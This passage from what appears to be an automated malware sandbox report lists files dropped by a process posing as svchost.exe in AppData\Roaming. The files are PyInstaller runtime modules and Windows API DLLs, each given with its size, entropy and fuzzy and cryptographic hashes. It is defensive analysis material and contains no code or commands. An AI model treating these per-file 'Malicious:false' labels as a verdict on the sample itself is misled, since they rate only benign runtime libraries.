                          SHA-512:7D6783D20AEC060BB1D5C72FADC8D52EF6812EE0776851C96FA2AD21B66C9FA853F5F43B8B775C8A741BD2B35938E2FCCAC16A829E37F7C425978C59BA62B60B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_queue.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):26288
                          Entropy (8bit):6.44734679501627
                          Encrypted:false
                          SSDEEP:768:XH9qUbFuF16rtrazup1IumUYllDG4yzFhj:3AUbFYktrazup1IumUYlvyH
                          MD5:963DD36AEC3EDB74C533B91C5A37498E
                          SHA1:5B553F18630F25C52A41BED0AC9C6262CCA662DA
                          SHA-256:D0E208BF308030C4BF879BA2A17FBEED48E10DD76C0DBDC9EB3D5F7A990302F6
                          SHA-512:513438B82C62BF26079BFD42CF6C562F7DF02A3190B246D9FB32B4342766C27EB77DEF8DE8D748B71C483CEC2B88DD9EDAE367ABFE8C157D135A259A8D859D48
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_socket.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):69808
                          Entropy (8bit):6.611317372453449
                          Encrypted:false
                          SSDEEP:1536:+NU6t0wKLlEIOiKISMD9f8+LeJzJbHjW/Z1IuBwC8lYHy/:+NPt0wKLlfkMD9f8ueJdbHi/Z1IuBwpL
                          MD5:FB09559F0C1C4DC91DFBE361828B0E39
                          SHA1:E38A5B68F38E6FFF3C276CEA2B40620B33295879
                          SHA-256:5EC25AD36306076275E094FCE70E150C632B193C916847535DF3904545F879F0
                          SHA-512:6D9BAE50E82F0B57240EFA2E637DE01C16CF1AEAAF95DD9F4B3DDF391CE163D140C06549243EF8D370D76A866190A49A1C1D8E8C0177CE8A709C574A1220E86C
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_ssl.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):143024
                          Entropy (8bit):6.46611957726107
                          Encrypted:false
                          SSDEEP:3072:Z8wJl2IslifCkaWuNPTTT/TpvdSRyOvm5GgDdhpIuM7GHux3P:Zpl2IsMDuTT/T/SRMGgDrqx
                          MD5:50F9B63B7632255FE69ABE0C2B4FAE04
                          SHA1:623BB9731CC5AA99EEB7C28DDF949495B0501717
                          SHA-256:0A7786AD8A9D4A24BD84B520BB7A8862DF949ABFCF10027172AAF0E3A18EDE7A
                          SHA-512:B35536AD316D7FABF7617451F9A4AC2088A473A97E8E023BB7AB55C50707ED9E7B3CAC2C72CE98A5F6D2CC56DF2A5D5A6B149110994006F76937BC22644D9273
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\_win32sysloader.pyd
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):11776
                          Entropy (8bit):5.256625843110757
                          Encrypted:false
                          SSDEEP:192:U48hFSvy3GI5DBb7qqAcUkOJk4fgF6O/G9RdfzaYy/o:sq8zb7DAcUkOJF3O/8I/
                          MD5:D9026D178C4220AA2C40CA592E31F5C6
                          SHA1:1EDD3463DA5AB5B442FCFBFB4E9A70940B7A5A76
                          SHA-256:D5E2378B9028810872ADE3AD7591B716466EAE621CA5B6FFFB4822949A9ABF9A
                          SHA-512:00251232772E5BAAF314DE7E8263229094D4057763620A3C929623E3C93CD30C8FA5243015434318CA9A4DFA8F2E82F9519AB6CF55F232D97296F0B5F93D376B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-console-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.080160932980843
                          Encrypted:false
                          SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                          MD5:502263C56F931DF8440D7FD2FA7B7C00
                          SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                          SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                          SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-datetime-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.093995452106596
                          Encrypted:false
                          SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                          MD5:CB978304B79EF53962408C611DFB20F5
                          SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                          SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                          SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-debug-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1028816880814265
                          Encrypted:false
                          SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                          MD5:88FF191FD8648099592ED28EE6C442A5
                          SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                          SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                          SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-errorhandling-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.126358371711227
                          Encrypted:false
                          SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                          MD5:6D778E83F74A4C7FE4C077DC279F6867
                          SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                          SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                          SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):21816
                          Entropy (8bit):7.014255619395433
                          Encrypted:false
                          SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                          MD5:94AE25C7A5497CA0BE6882A00644CA64
                          SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                          SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                          SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.112057846012794
                          Encrypted:false
                          SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                          MD5:E2F648AE40D234A3892E1455B4DBBE05
                          SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                          SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                          SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-file-l2-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.166618249693435
                          Encrypted:false
                          SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                          MD5:E479444BDD4AE4577FD32314A68F5D28
                          SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                          SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                          SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-handle-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1117101479630005
                          Encrypted:false
                          SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                          MD5:6DB54065B33861967B491DD1C8FD8595
                          SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                          SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                          SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-heap-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.174986589968396
                          Encrypted:false
                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                          MD5:2EA3901D7B50BF6071EC8732371B821C
                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-interlocked-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17856
                          Entropy (8bit):7.076803035880586
                          Encrypted:false
                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-libraryloader-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.131154779640255
                          Encrypted:false
                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-localization-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.089032314841867
                          Encrypted:false
                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-memory-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.101895292899441
                          Encrypted:false
                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                          MD5:D500D9E24F33933956DF0E26F087FD91
                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-namedpipe-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.16337963516533
                          Encrypted:false
                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                          MD5:6F6796D1278670CCE6E2D85199623E27
                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processenvironment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.073730829887072
                          Encrypted:false
                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19392
                          Entropy (8bit):7.082421046253008
                          Encrypted:false
                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-processthreads-l1-1-1.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.1156948849491055
                          Encrypted:false
                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                          MD5:D0289835D97D103BAD0DD7B9637538A1
                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-profile-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17712
                          Entropy (8bit):7.187691342157284
                          Encrypted:false
                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-rtlsupport-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17720
                          Entropy (8bit):7.19694878324007
                          Encrypted:false
                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-string-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.137724132900032
                          Encrypted:false
                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                          MD5:12CC7D8017023EF04EBDD28EF9558305
                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.04640581473745
                          Encrypted:false
                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-synch-l1-2-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.138910839042951
                          Encrypted:false
                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-sysinfo-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.072555805949365
                          Encrypted:false
                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                          MD5:19A40AF040BD7ADD901AA967600259D9
                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-timezone-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18224
                          Entropy (8bit):7.17450177544266
                          Encrypted:false
                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                          MD5:BABF80608FD68A09656871EC8597296C
                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-core-util-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1007227686954275
                          Encrypted:false
                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                          MD5:0F079489ABD2B16751CEB7447512A70D
                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-conio-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.088693688879585
                          Encrypted:false
                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                          MD5:6EA692F862BDEB446E649E4B2893E36F
                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-convert-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22328
                          Entropy (8bit):6.929204936143068
                          Encrypted:false
                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                          Malicious:false
                          Reputation:unknown
                          C:\Users\user\AppData\Local\Temp\_MEI63082\api-ms-win-crt-environment-l1-1-0.dll
                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18736
                          Entropy (8bit):7.078409479204304
                          Encrypted:false
